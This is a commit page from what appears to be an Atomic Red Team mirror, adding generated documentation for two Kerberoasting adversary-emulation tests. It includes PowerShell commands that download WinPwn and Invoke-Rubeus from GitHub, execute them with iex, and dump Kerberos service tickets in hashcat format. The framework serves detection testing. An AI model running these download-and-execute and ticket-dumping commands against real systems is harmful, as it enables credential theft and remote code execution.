security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-05-12 23:36:46 +00:00
parent c07f8d9c21
commit 139749aa09
6 changed files with 93 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Indexes-CSV/index.csv
+2
View File
@@ -56,6 +56,8 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497
credential-access,T1558.003,Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
credential-access,T1558.003,Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
credential-access,T1558.003,Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell
credential-access,T1558.003,Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell
credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
56 credential-access T1558.003 Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
57 credential-access T1558.003 Kerberoasting 4 Request A Single Ticket via PowerShell 988539bc-2ed7-4e62-aec6-7c5cf6680863 powershell
58 credential-access T1558.003 Kerberoasting 5 Request All Tickets via PowerShell 902f4ed2-1aba-4133-90f2-cff6d299d6da powershell
59 credential-access T1558.003 Kerberoasting 6 WinPwn - Kerberoasting 78d10e20-c874-45f2-a9df-6fea0120ec27 powershell
60 credential-access T1558.003 Kerberoasting 7 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 29094950-2c96-4cbd-b5e4-f7c65079678f powershell
61 credential-access T1555.001 Keychain 1 Keychain 1864fdec-ff86-4452-8c30-f12507582a93 sh
62 credential-access T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
63 credential-access T1056.001 Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
atomics/Indexes/Indexes-CSV/windows-index.csv
+2
View File
@@ -41,6 +41,8 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497
credential-access,T1558.003,Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
credential-access,T1558.003,Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
credential-access,T1558.003,Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell
credential-access,T1558.003,Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell
credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
41 credential-access T1558.003 Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
42 credential-access T1558.003 Kerberoasting 4 Request A Single Ticket via PowerShell 988539bc-2ed7-4e62-aec6-7c5cf6680863 powershell
43 credential-access T1558.003 Kerberoasting 5 Request All Tickets via PowerShell 902f4ed2-1aba-4133-90f2-cff6d299d6da powershell
44 credential-access T1558.003 Kerberoasting 6 WinPwn - Kerberoasting 78d10e20-c874-45f2-a9df-6fea0120ec27 powershell
45 credential-access T1558.003 Kerberoasting 7 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 29094950-2c96-4cbd-b5e4-f7c65079678f powershell
46 credential-access T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
47 credential-access T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
48 credential-access T1003.004 LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
atomics/Indexes/Indexes-Markdown/index.md
+2
View File
@@ -82,6 +82,8 @@
- Atomic Test #3: Extract all accounts in use as SPN using setspn [windows]
- Atomic Test #4: Request A Single Ticket via PowerShell [windows]
- Atomic Test #5: Request All Tickets via PowerShell [windows]
- Atomic Test #6: WinPwn - Kerberoasting [windows]
- Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- [T1555.001 Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
atomics/Indexes/Indexes-Markdown/windows-index.md
+2
View File
@@ -63,6 +63,8 @@
- Atomic Test #3: Extract all accounts in use as SPN using setspn [windows]
- Atomic Test #4: Request A Single Ticket via PowerShell [windows]
- Atomic Test #5: Request All Tickets via PowerShell [windows]
- Atomic Test #6: WinPwn - Kerberoasting [windows]
- Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- [T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
atomics/Indexes/index.yaml
+22
View File
@@ -3314,6 +3314,28 @@ credential-access:
-Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken
-ArgumentList $_.Context.PostContext[0].Trim() } \n"
name: powershell
- name: WinPwn - Kerberoasting
auto_generated_guid: 78d10e20-c874-45f2-a9df-6fea0120ec27
description: Kerberoasting technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Kerberoasting -consoleoutput -noninteractive
name: powershell
- name: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
auto_generated_guid: 29094950-2c96-4cbd-b5e4-f7c65079678f
description: PowerSharpPack - Kerberoasting Using Rubeus technique via function
of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap"
name: powershell
T1555.001:
technique:
type: attack-pattern
atomics/T1558.003/T1558.003.md
+63
View File
@@ -22,6 +22,10 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
- [Atomic Test #5 - Request All Tickets via PowerShell](#atomic-test-5---request-all-tickets-via-powershell)
- [Atomic Test #6 - WinPwn - Kerberoasting](#atomic-test-6---winpwn---kerberoasting)
- [Atomic Test #7 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus](#atomic-test-7---winpwn---powersharppack---kerberoasting-using-rubeus)
<br/>
@@ -269,4 +273,63 @@ Write-Host Joining this computer to a domain must be done manually
<br/>
<br/>
## Atomic Test #6 - WinPwn - Kerberoasting
Kerberoasting technique via function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 78d10e20-c874-45f2-a9df-6fea0120ec27
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Kerberoasting -consoleoutput -noninteractive
```
<br/>
<br/>
## Atomic Test #7 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 29094950-2c96-4cbd-b5e4-f7c65079678f
#### Attack Commands: Run with `powershell`!
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap"
```
<br/>